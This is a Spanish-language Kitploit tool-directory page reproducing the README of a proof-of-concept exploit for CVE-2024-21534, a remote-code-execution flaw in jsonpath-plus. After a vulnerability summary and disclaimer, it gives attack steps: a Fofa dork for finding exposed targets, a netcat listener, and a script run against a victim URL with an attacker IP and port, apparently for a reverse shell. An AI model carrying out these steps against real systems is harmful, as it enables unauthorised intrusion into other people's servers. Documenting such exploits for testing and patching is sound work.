Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2024-21534 — POC - CVE-2024-21534 Jsonpath-plus vulnerable a la Ejecución Remota de Código (RCE) debido a una desinfección inadecuada de la entrada. | Kitploit
Herramientas/GitHubGitHub/verylazytech/cve-2024-21534
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubverylazytech/cve-2024-21534

cve-2024-21534

POC - CVE-2024-21534 Jsonpath-plus vulnerable a la Ejecución Remota de Código (RCE) debido a una desinfección inadecuada de la entrada.

Ver Repositorio
51hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

POC - CVE-2024-21534 Jsonpath-plus vulnerable a la Ejecución Remota de Código (RCE) debido a una sanitización inadecuada de la entrada

My Shop Medium Github Buy Me A Coffee

Resumen

CVE-2024-21534 es una vulnerabilidad crítica encontrada en versiones del paquete jsonpath-plus anteriores a la versión 10.0.0. La vulnerabilidad se debe a una sanitización inadecuada de la entrada, lo que puede llevar a una Ejecución Remota de Código (RCE) en los sistemas afectados. Esta vulnerabilidad es particularmente peligrosa ya que puede ser explotada sin autenticación, permitiendo a los atacantes ejecutar código arbitrario en el servidor mediante el envío de entrada especialmente diseñada. Este problema surge del uso inseguro por defecto del módulo vm de Node.js, que, si se explota, podría comprometer todo el sistema.

Versiones Afectadas

versiones de jsonpath-plus anteriores a la 10.2.0

Componentes Afectados

La vulnerabilidad se encuentra en el paquete jsonpath-plus, que es ampliamente utilizado para consultar estructuras de datos JSON en aplicaciones. El fallo se debe a una sanitización inadecuada de la entrada, permitiendo la ejecución de código malicioso.

Leer sobre ello — CVE-2024-21534

Descargo de responsabilidad: Este Prueba de Concepto (POC) está hecho únicamente con fines educativos y de prueba ética. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables por cualquier mal uso o daño causado por este programa.

Comenzando

Encontrando Objetivos

Para encontrar posibles objetivos, use Fofa (similar a Shodan.io):

  • Fofa Dork: Jsonpath-plus

Fofa

Clonando el Repositorio

Primero, clone el repositorio:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-21534

Ahora abra un listener usando nc:

root@kitploit:~
nc -lnvp 443

Ejecutar el Exploit:

Para Linux / MacOS:

Asegúrese de que la URL apunte a un endpoint que procese la entrada del usuario a través del paquete jsonpath-plus vulnerable, ya que esto permitirá la explotación de la vulnerabilidad RCE.

root@kitploit:~
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

secoand

listando algunos directorios:

last

Descargar herramienta